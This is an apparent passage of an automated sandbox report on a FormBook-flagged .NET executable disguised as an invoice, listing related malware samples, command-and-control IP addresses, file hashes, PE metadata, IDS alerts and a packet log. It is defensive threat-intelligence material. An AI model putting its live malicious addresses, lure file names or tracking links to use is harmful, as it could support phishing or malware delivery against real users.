                                                                                                                                      • 176.223.133.62
                                                                                                                                      p3py1hgLA1.elfGet hashmaliciousUnknownBrowse
                                                                                                                                      • 176.223.133.62
                                                                                                                                      TJQvjbmPHA.elfGet hashmaliciousUnknownBrowse
                                                                                                                                      • 176.223.133.62
                                                                                                                                      TIS-DIALOG-ASRUllADOrptJY.elfGet hashmaliciousMiraiBrowse
                                                                                                                                      • 185.234.121.165
                                                                                                                                      M2CRoPxCDK.elfGet hashmaliciousUnknownBrowse
                                                                                                                                      • 213.149.20.214
                                                                                                                                      https://r20.rs6.net/tn.jsp?f=001aWvo3AAHeKpzw4Mz_sgYedpUawImPJsIps10Y8KYyNgYNz9veso7-cqLq8Ea4Kz4hKxMhfMBFtf-ffFtVC0q7ivGR36wf1VR8lyGBPIGdyfvSdYQA-i_Ls0DZQM2OGfs5QV_OFuzyeVR1SlSz9DgdpNGEtqd-Xjg&c=&ch=#Y2xpZW50c2VydmljZXNAYmFycm93aGFubGV5LmNvbQ==Get hashmaliciousUnknownBrowse
                                                                                                                                      • 178.211.133.68
                                                                                                                                      LhzvaAYMk3.elfGet hashmaliciousMiraiBrowse
                                                                                                                                      • 185.234.121.164
                                                                                                                                      Ship'_particular_pdf.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                                                                      • 178.211.133.50
                                                                                                                                      MT_PAPA-AGENCY_APPOINTMENT_AND_PDA_QUERY_pdf.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                                                                      • 178.211.133.50
                                                                                                                                      r20220829_PEDIDO_22073M_PROTECO_LIMPIEZA_Y_KITS.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                      • 178.211.133.50
                                                                                                                                      #U00d6DEME_FATURASI.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                      • 178.211.133.50
                                                                                                                                      skid.x86_64.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                      • 31.192.150.227
                                                                                                                                      uTsXcPpJK6.elfGet hashmaliciousMiraiBrowse
                                                                                                                                      • 213.149.20.213
                                                                                                                                      NBS11696UShiqWVuoNwf.elfGet hashmaliciousMiraiBrowse
                                                                                                                                      • 209.87.95.135
                                                                                                                                      narud#U017ebenicu 0BH2024.exeGet hashmaliciousFormBookBrowse
                                                                                                                                      • 64.190.62.22
                                                                                                                                      http://altruisticcost.comGet hashmaliciousUnknownBrowse
                                                                                                                                      • 64.190.63.136
                                                                                                                                      n3R8WBIjhz.exeGet hashmaliciousFormBookBrowse
                                                                                                                                      • 64.190.62.22
                                                                                                                                      8C3H9zQgK2.exeGet hashmaliciousFormBookBrowse
                                                                                                                                      • 64.190.62.22
                                                                                                                                      240330_unpackedGet hashmaliciousUnknownBrowse
                                                                                                                                      • 64.190.63.222
                                                                                                                                      mrPTE618YB.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                                                      • 64.190.63.222
                                                                                                                                      1LZvA2cEfV.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                      • 64.190.62.22
                                                                                                                                      XJBYhQFCGi.exeGet hashmaliciousFormBookBrowse
                                                                                                                                      • 64.190.62.22
                                                                                                                                      aMVimXl3J6.exeGet hashmaliciousFormBookBrowse
                                                                                                                                      • 64.190.62.22
                                                                                                                                      SEDO-ASDEArrival Notice.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                      • 91.195.240.19
                                                                                                                                      RFQ.exeGet hashmaliciousFormBookBrowse
                                                                                                                                      • 91.195.240.117
                                                                                                                                      NEW-ORDER_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                      • 91.195.240.19
                                                                                                                                      VAT PO 24000042.exeGet hashmaliciousFormBookBrowse
                                                                                                                                      • 91.195.240.123
                                                                                                                                      202404153836038.EXE.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                      • 91.195.240.19
                                                                                                                                      SecuriteInfo.com.Trojan.Packed2.46654.20750.14267.exeGet hashmaliciousFormBookBrowse
                                                                                                                                      • 91.195.240.123
                                                                                                                                      Ordin de plat#U0103.exeGet hashmaliciousFormBookBrowse
                                                                                                                                      • 91.195.240.123
                                                                                                                                      PO# ROSIT#U00a0MR2309040.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                      • 91.195.240.19
                                                                                                                                      alhadani Aprilorders140424.scr.exeGet hashmaliciousFormBookBrowse
                                                                                                                                      • 91.195.240.19
                                                                                                                                      Arrival Notice.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                      • 91.195.240.19
                                                                                                                                      ONEANDONE-ASBrauerstrasse48DES#U0130PAR#U0130S_0433.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                      • 217.160.0.183
                                                                                                                                      16042024124528724.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                      • 217.160.0.183
                                                                                                                                      160420241245287.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                      • 217.160.0.183
                                                                                                                                      16042024124521.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                      • 217.160.0.183
                                                                                                                                      2024164846750.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                      • 217.160.0.183
                                                                                                                                      S#U0130PAR#U0130S_0453.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                      • 217.160.0.183
                                                                                                                                      file.exeGet hashmaliciousFormBookBrowse
                                                                                                                                      • 217.160.0.46
                                                                                                                                      2024041342836038.EXE.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                      • 217.160.0.183
                                                                                                                                      202404153836038.EXE.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                      • 217.160.0.183
                                                                                                                                      zamowienie_002523.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                      • 217.160.0.183

                                                                                                                                      JA3 Fingerprints

                                                                                                                                      No context

                                                                                                                                      Dropped Files

                                                                                                                                      No context

                                                                                                                                      Created / dropped Files

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\HYCO_Invoices MS2 & MS3.exe.log

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe
                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1216
                                                                                                                                      Entropy (8bit):5.34331486778365
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:high, very likely benign file
                                                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                                                      C:\Users\user\AppData\Local\Temp\C3vB7APK

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Windows\SysWOW64\replace.exe
                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):114688
                                                                                                                                      Entropy (8bit):0.9746603542602881
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:high, very likely benign file
                                                                                                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                      Static File Info

                                                                                                                                      General

                                                                                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                      Entropy (8bit):7.928031153635638
                                                                                                                                      TrID:
                                                                                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                      • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                      File name:HYCO_Invoices MS2 & MS3.exe
                                                                                                                                      File size:734'216 bytes
                                                                                                                                      MD5:96fe3d00e8b2ba36dfb240a004ab28e1
                                                                                                                                      SHA1:757169009af1210acab01e9a2385e5cca4b94f20
                                                                                                                                      SHA256:57b81292b61a36171a2ad822d255aae878a8f9ca187efb43da94c7865c8388c4
                                                                                                                                      SHA512:d104d155837bcff0125d120ff9002cfbab3dc00839359e249f97ed4a78849da8ce0ab59ca084397fbb3193526a9d535d9986c49bee8e914f0dda0ec42f1c72c1
                                                                                                                                      SSDEEP:12288:j+NKG40wYjR2HI7OZGiOp+epbysKCRePsDl2h4TJEAvmxUP5kR:j+LXMH4OZGiiV9RWsJ2h4TOfxqk
                                                                                                                                      TLSH:49F4124877FC5AA0D8EA0F3650B4AA11873DBC126C13FB6D6CD060AF5DB2BD64B405A7
                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...s..f..............0......F........... ........@.. .......................`............@................................

                                                                                                                                      File Icon

                                                                                                                                      Icon Hash:1d55909890818585

                                                                                                                                      Static PE Info

                                                                                                                                      General

                                                                                                                                      Entrypoint:0x4ad506
                                                                                                                                      Entrypoint Section:.text
                                                                                                                                      Digitally signed:true
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      Subsystem:windows gui
                                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                      Time Stamp:0x661ECB73 [Tue Apr 16 19:03:15 2024 UTC]
                                                                                                                                      TLS Callbacks:
                                                                                                                                      CLR (.Net) Version:
                                                                                                                                      OS Version Major:4
                                                                                                                                      OS Version Minor:0
                                                                                                                                      File Version Major:4
                                                                                                                                      File Version Minor:0
                                                                                                                                      Subsystem Version Major:4
                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                      Authenticode Signature

                                                                                                                                      Signature Valid:false
                                                                                                                                      Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                                                                                                                      Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                      Error Number:-2146869232
                                                                                                                                      Not Before, Not After
                                                                                                                                      • 13/11/2018 00:00:00 08/11/2021 23:59:59
                                                                                                                                      Subject Chain
                                                                                                                                      • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                                                                                                                      Version:3
                                                                                                                                      Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                                                                                                                      Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                                                                                                                      Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                                                                                                                      Serial:7C1118CBBADC95DA3752C46E47A27438

                                                                                                                                      Entrypoint Preview

                                                                                                                                      Instruction
                                                                                                                                      jmp dword ptr [00402000h]
                                                                                                                                      inc esp
                                                                                                                                      cmp byte ptr [ebx+38h], al
                                                                                                                                      inc ebx
                                                                                                                                      aaa
                                                                                                                                      dec eax
                                                                                                                                      xor al, 33h
                                                                                                                                      aaa
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      aaa
                                                                                                                                      xor al, 38h
                                                                                                                                      inc esp
                                                                                                                                      inc ecx
                                                                                                                                      aaa
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      cmp byte ptr [eax], bh
                                                                                                                                      push ebx
                                                                                                                                      dec eax
                                                                                                                                      inc ebp
                                                                                                                                      inc esi
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al

                                                                                                                                      Data Directories

                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xad4b40x4f.text
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xae0000x42b4.rsrc
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0xafe000x3608
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xb40000xc.reloc
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                      Sections

                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                      .text0x20000xab52c0xab6000c2b248282e2f1fe0c893f854e79278aFalse0.9550410854303428data7.956113865860276IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                      .rsrc0xae0000x42b40x4400494b68891bf97d9cfff4f88d3394dd15False0.3323184742647059data5.194376730660157IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                      .reloc0xb40000xc0x2008b22555a2f535c8b0a47c2ac9a15bb65False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                      Resources

                                                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                      RT_ICON0xae2f80x130Device independent bitmap graphic, 32 x 64 x 1, image size 1280.5032894736842105
                                                                                                                                      RT_ICON0xae4280xb0Device independent bitmap graphic, 16 x 32 x 1, image size 640.4943181818181818
                                                                                                                                      RT_ICON0xae4d80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 5120.5497311827956989
                                                                                                                                      RT_ICON0xae7c00x1e8Device independent bitmap graphic, 24 x 48 x 4, image size 2880.5614754098360656
                                                                                                                                      RT_ICON0xae9a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 1280.5844594594594594
                                                                                                                                      RT_ICON0xaead00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors0.33077617328519854
                                                                                                                                      RT_ICON0xaf3780x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors0.48963133640552997
                                                                                                                                      RT_ICON0xafa400x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors0.3468208092485549
                                                                                                                                      RT_ICON0xaffa80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 42240.18151969981238275
                                                                                                                                      RT_ICON0xb10500x988Device independent bitmap graphic, 24 x 48 x 32, image size 24000.45614754098360655
                                                                                                                                      RT_ICON0xb19d80x468Device independent bitmap graphic, 16 x 32 x 32, image size 10880.49024822695035464
                                                                                                                                      RT_GROUP_ICON0xb1e400xa0data0.6
                                                                                                                                      RT_GROUP_ICON0xb1ee00x14data1.05
                                                                                                                                      RT_VERSION0xb1ef40x3c0data0.45

                                                                                                                                      Imports

                                                                                                                                      DLLImport
                                                                                                                                      mscoree.dll_CorExeMain

                                                                                                                                      Network Behavior

                                                                                                                                      Snort IDS Alerts

                                                                                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                      04/17/24-08:39:42.561650TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24974380192.168.2.491.195.240.117
                                                                                                                                      04/17/24-08:40:41.121135TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24975980192.168.2.4178.211.137.59
                                                                                                                                      04/17/24-08:39:17.162071TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24973880192.168.2.479.98.25.1
                                                                                                                                      04/17/24-08:40:11.246310TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24975180192.168.2.4217.76.128.34
                                                                                                                                      04/17/24-08:39:56.404713TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24974780192.168.2.464.190.62.22

                                                                                                                                      Network Port Distribution

                                                                                                                                      TCP Packets

                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                      Apr 17, 2024 08:39:16.931385040 CEST4973880192.168.2.479.98.25.1
                                                                                                                                      Apr 17, 2024 08:39:17.159584999 CEST804973879.98.25.1192.168.2.4
                                                                                                                                      Apr 17, 2024 08:39:17.159718990 CEST4973880192.168.2.479.98.25.1
                                                                                                                                      Apr 17, 2024 08:39:17.162070990 CEST4973880192.168.2.479.98.25.1
                                                                                                                                      Apr 17, 2024 08:39:17.389904022 CEST804973879.98.25.1192.168.2.4
                                                                                                                                      Apr 17, 2024 08:39:17.389969110 CEST804973879.98.25.1192.168.2.4
                                                                                                                                      Apr 17, 2024 08:39:17.389987946 CEST804973879.98.25.1192.168.2.4
                                                                                                                                      Apr 17, 2024 08:39:17.390005112 CEST804973879.98.25.1192.168.2.4
                                                                                                                                      Apr 17, 2024 08:39:17.390022039 CEST804973879.98.25.1192.168.2.4
                                                                                                                                      Apr 17, 2024 08:39:17.390039921 CEST804973879.98.25.1192.168.2.4
                                                                                                                                      Apr 17, 2024 08:39:17.390059948 CEST804973879.98.25.1192.168.2.4
                                                                                                                                      Apr 17, 2024 08:39:17.390117884 CEST4973880192.168.2.479.98.25.1
                                                                                                                                      Apr 17, 2024 08:39:17.390191078 CEST4973880192.168.2.479.98.25.1
                                                                                                                                      Apr 17, 2024 08:39:17.393316031 CEST4973880192.168.2.479.98.25.1
                                                                                                                                      Apr 17, 2024 08:39:17.619931936 CEST804973879.98.25.1192.168.2.4
                                                                                                                                      Apr 17, 2024 08:39:34.140484095 CEST4974080192.168.2.491.195.240.117
                                                                                                                                      Apr 17, 2024 08:39:34.350733995 CEST804974091.195.240.117192.168.2.4
                                                                                                                                      Apr 17, 2024 08:39:34.350804090 CEST4974080192.168.2.491.195.240.117
                                                                                                                                      Apr 17, 2024 08:39:34.352952003 CEST4974080192.168.2.491.195.240.117
                                                                                                                                      Apr 17, 2024 08:39:34.563458920 CEST804974091.195.240.117192.168.2.4
                                                                                                                                      Apr 17, 2024 08:39:36.878288031 CEST4974180192.168.2.491.195.240.117
                                                                                                                                      Apr 17, 2024 08:39:37.089325905 CEST804974191.195.240.117192.168.2.4
                                                                                                                                      Apr 17, 2024 08:39:37.089473963 CEST4974180192.168.2.491.195.240.117
                                                                                                                                      Apr 17, 2024 08:39:37.091234922 CEST4974180192.168.2.491.195.240.117
                                                                                                                                      Apr 17, 2024 08:39:37.303014040 CEST804974191.195.240.117192.168.2.4
                                                                                                                                      Apr 17, 2024 08:39:37.303077936 CEST804974191.195.240.117192.168.2.4
                                                                                                                                      Apr 17, 2024 08:39:37.303200960 CEST4974180192.168.2.491.195.240.117
                                                                                                                                      Apr 17, 2024 08:39:38.594655991 CEST4974180192.168.2.491.195.240.117
                                                                                                                                      Apr 17, 2024 08:39:39.613145113 CEST4974280192.168.2.491.195.240.117
                                                                                                                                      Apr 17, 2024 08:39:39.824353933 CEST804974291.195.240.117192.168.2.4
                                                                                                                                      Apr 17, 2024 08:39:39.824482918 CEST4974280192.168.2.491.195.240.117
                                                                                                                                      Apr 17, 2024 08:39:39.826584101 CEST4974280192.168.2.491.195.240.117
                                                                                                                                      Apr 17, 2024 08:39:40.037828922 CEST804974291.195.240.117192.168.2.4
                                                                                                                                      Apr 17, 2024 08:39:40.037888050 CEST804974291.195.240.117192.168.2.4
                                                                                                                                      Apr 17, 2024 08:39:40.037921906 CEST804974291.195.240.117192.168.2.4
                                                                                                                                      Apr 17, 2024 08:39:40.037952900 CEST804974291.195.240.117192.168.2.4
                                                                                                                                      Apr 17, 2024 08:39:40.037985086 CEST804974291.195.240.117192.168.2.4
                                                                                                                                      Apr 17, 2024 08:39:40.038014889 CEST804974291.195.240.117192.168.2.4
                                                                                                                                      Apr 17, 2024 08:39:40.038047075 CEST804974291.195.240.117192.168.2.4
                                                                                                                                      Apr 17, 2024 08:39:40.038364887 CEST804974291.195.240.117192.168.2.4
                                                                                                                                      Apr 17, 2024 08:39:40.038400888 CEST804974291.195.240.117192.168.2.4
                                                                                                                                      Apr 17, 2024 08:39:40.038465977 CEST4974280192.168.2.491.195.240.117
                                                                                                                                      Apr 17, 2024 08:39:41.329051971 CEST4974280192.168.2.491.195.240.117
                                                                                                                                      Apr 17, 2024 08:39:42.349292994 CEST4974380192.168.2.491.195.240.117
                                                                                                                                      Apr 17, 2024 08:39:42.559766054 CEST804974391.195.240.117192.168.2.4
                                                                                                                                      Apr 17, 2024 08:39:42.560015917 CEST4974380192.168.2.491.195.240.117
                                                                                                                                      Apr 17, 2024 08:39:42.561650038 CEST4974380192.168.2.491.195.240.117
                                                                                                                                      Apr 17, 2024 08:39:42.772665977 CEST804974391.195.240.117192.168.2.4
                                                                                                                                      Apr 17, 2024 08:39:42.772712946 CEST804974391.195.240.117192.168.2.4
                                                                                                                                      Apr 17, 2024 08:39:42.773061991 CEST4974380192.168.2.491.195.240.117
                                                                                                                                      Apr 17, 2024 08:39:42.775412083 CEST4974380192.168.2.491.195.240.117
                                                                                                                                      Apr 17, 2024 08:39:42.985905886 CEST804974391.195.240.117192.168.2.4
                                                                                                                                      Apr 17, 2024 08:39:47.974397898 CEST4974480192.168.2.464.190.62.22
                                                                                                                                      Apr 17, 2024 08:39:48.185107946 CEST804974464.190.62.22192.168.2.4
                                                                                                                                      Apr 17, 2024 08:39:48.185415983 CEST4974480192.168.2.464.190.62.22
                                                                                                                                      Apr 17, 2024 08:39:48.187171936 CEST4974480192.168.2.464.190.62.22
                                                                                                                                      Apr 17, 2024 08:39:48.398648024 CEST804974464.190.62.22192.168.2.4
                                                                                                                                      Apr 17, 2024 08:39:48.398715019 CEST804974464.190.62.22192.168.2.4
                                                                                                                                      Apr 17, 2024 08:39:48.398796082 CEST4974480192.168.2.464.190.62.22
                                                                                                                                      Apr 17, 2024 08:39:49.688700914 CEST4974480192.168.2.464.190.62.22
                                                                                                                                      Apr 17, 2024 08:39:50.706794977 CEST4974580192.168.2.464.190.62.22
                                                                                                                                      Apr 17, 2024 08:39:50.917534113 CEST804974564.190.62.22192.168.2.4
                                                                                                                                      Apr 17, 2024 08:39:50.917866945 CEST4974580192.168.2.464.190.62.22
                                                                                                                                      Apr 17, 2024 08:39:50.920397043 CEST4974580192.168.2.464.190.62.22
                                                                                                                                      Apr 17, 2024 08:39:51.132538080 CEST804974564.190.62.22192.168.2.4
                                                                                                                                      Apr 17, 2024 08:39:51.132596016 CEST804974564.190.62.22192.168.2.4
                                                                                                                                      Apr 17, 2024 08:39:51.132854939 CEST4974580192.168.2.464.190.62.22
                                                                                                                                      Apr 17, 2024 08:39:52.422671080 CEST4974580192.168.2.464.190.62.22
                                                                                                                                      Apr 17, 2024 08:39:53.442257881 CEST4974680192.168.2.464.190.62.22
                                                                                                                                      Apr 17, 2024 08:39:53.653523922 CEST804974664.190.62.22192.168.2.4
                                                                                                                                      Apr 17, 2024 08:39:53.653610945 CEST4974680192.168.2.464.190.62.22
                                                                                                                                      Apr 17, 2024 08:39:53.656670094 CEST4974680192.168.2.464.190.62.22
